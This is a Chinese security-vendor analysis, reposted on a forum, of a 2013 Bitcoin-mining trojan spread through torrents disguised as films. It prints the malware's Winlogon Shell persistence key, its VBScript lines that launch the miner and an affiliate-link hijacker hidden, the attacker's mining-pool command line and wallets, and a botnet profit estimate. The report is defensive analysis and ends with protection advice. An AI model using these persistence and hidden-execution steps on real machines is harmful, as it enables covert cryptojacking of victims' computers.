|
背景: 比特币最近几个月较为火爆,国际上对于比特币的炒作也越来越多。2013年4月的雅安地震中,壹基金就收到233个比特币(折合人民币近22万元)的捐款。如今黑客的目光也投向了比特币。
6月5日,金山安全中心率先截获的“比特币矿工”病毒,它伪装成热门电影《中国合伙人》、《星际迷航:暗黑无 界》等通过bt种子传播,骗取用户下载。用户不慎运行后,病毒会向windows目录下释放csrss.exe,svchost.exe,lsass.exe 等病毒文件,进行淘宝客劫持、刷网站流量、挖比特币等行为。新闻链接
比特币矿工木马流程图
病毒母体: 病毒母体通过BT种子传播,伪装为电影文件,程序的图标也伪装为播放器图标。病毒母体通过末尾overlay填充0进行膨胀,使得病毒母体达800M的体积,迷惑用户认为这个程序为正常电影。 
母体行为较为简单,大致分为3个行为:
1.释放病毒文件至Windows目录。
运行后会将csrss.exe,svchost.exe,lsass.exe (这些文件为与系统同名的病毒文件)等病毒文件释放至Windows目录下。
2.设置启动项
将csrss文件加入到启动项中,此步骤和上一步骤都是用了smart install方法。将释放的文件和需要修改的注册表都写在了配置文件中,当做安装程序一样修改注册表,释放文件。
3.弹框提示用户此视频无法播放
此程序会弹出窗口,提示用户,此文件无法播放,从而隐蔽自己。
病毒子体: 母体释放的主要的病毒子体为csrss.exe,svchost.exe,lsass.exe。病毒文件csrss.exe(伪装后的名称)为主要调动程序,负责调用svchost.exe(病毒,刷淘宝客)和lsass.exe(病毒,用于刷比特币,挖矿工具)。(后文都用csrss.exe, svchost.exe,lsass.exe 这三个名字代表这三个病毒文件,切勿与系统文件混淆,特此声明)。其余文件为挖矿程序的附加程序。
【Csrss.exe】 被设置为自启动项,启动后解密自身资源中的脚本,运行脚本。调用svchost和lsass.exe两个程序进行刷淘宝客和比特币,后台访问51yingshi刷流量。
自启动项: [HKEY_CURRENT_USER\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon] "Shell"="explorer.exe,C:\\Windows\\csrss.exe"
生成的脚本内容: 
简单的解释一下这段代码的含义:
本段代码有3个作用,调用lsass.exe进行刷比特币,调用svchost刷淘宝客,访问创建一个wscript.shell对象WS,ws对象运行两个命令。
(1)WS.Run"C:\Windows\svchost.exe 15653040_3457137_11236246",0,False 这里调用svchost,进行刷淘宝客。 后面标红的参数15653040_3457137_11236246为PID。
(2)WS.Run"C:\Windows\lsass.exe "&Lsass(Num)&"",0,False
执行lsass程序进行刷bit币,后面的登录账号有两个选择,每次随即抽取。 Lsass(2)="--scrypt --urlhttp://51wakuang.net:9327 --user LQYU5RGhvCVUBePSfAfAcsLkt5XSi1EgBQ --pass P@ssw0rd --auto-fan --auto-gpu"
代码如下: IE.Visible=Flase 【Lsass.exe】 此文件严格意义上不算是病毒。此文件原名为cgminer,是一个公开的挖矿软件,与此软件一起的文件有12个(包含一个文件夹)。其中lsass用于gpu挖矿,lsass-nogpu用于cpu挖矿。病毒作者这里只调用了lsass,利用Gpu挖矿,没有利用cpu进行挖矿。原因可能是cpu完矿的效率很低。本文最后附属cpu 、gpu挖矿效率对比。
挖矿文件列表如下:
用法为: cgminer-o 矿池地址 -u 用户名 -p 密码
可以推断出的信息有病毒作者挖矿的矿池,钱包和密码。
钱包地址:1ByRGxLJHempFNi7JyTspXG3oFyrp7GHFH 密码:P@ssw0rd--auto-fan --auto-gpu
2.矿池:http://51wakuang.net:9327 钱包地址:LQYU5RGhvCVUBePSfAfAcsLkt5XSi1EgBQ 密码:P@ssw0rd--auto-fan --auto-gpu
此程序运行截图:
Svchost.exe 用于淘宝客劫持,盗用了智谋淘宝客插件。淘宝客劫持的手法较为普通,这里不做过多介绍。
防御方案: 1.实时开启新毒霸等主流杀毒软件,用种子下载电影后,要观察后缀是否为exe,如果为exe则为病毒。 2.下载电影后,要观察文件的图标是否与其他视频的图标相同。此处的样本图标为realplayer的图标,如果装有其他播放器(例如暴风),此图标不正常,很可能为病毒。 3.当使用计算机时,突然间变的很卡。检查如果发现不正常程序占用了绝大数的资源,重启后依然无效,则可能感染了“比特币矿工”病毒。
解决方案:
如果发现电脑感染了“比特币矿工”病毒,使用新毒霸一键云查杀即可清除。
附录:
1.僵尸网络进行挖矿的行业分析。
用比特币计算器可以得出当前的比特币块的计算难度因子,计算能力,交换律。http://www.alloscomp.com/bitcoin/calculator 假如单台计算机的计算率为1.0mega-hashes/second 话,一个月单机可赚0.12美金。控制一个10W台数量的僵尸网络,则可以每月可收益12000美金。
实际中,使用cpu进行挖矿要比显卡挖矿效率会低很多。如下图所示。详细的请参考https://en.bitcoin.it/wiki/Mining_hardware_comparison
一个单AMD Radeon 6750 显卡,每月可赚取3个bit币,如果可以控制1000台这样的计算机,每月则可以赚取3000 bitcoin ,也就是369000美元。对于病毒作者来说是一个不小的诱惑,对于比特币的持续升值,此类木马将来可能会有扩展的趋势。
 | 
[复制链接]
发表于 2013-6-9 07:51:56
楼主
发表于 2013-6-9 08:56:04
多步很容易 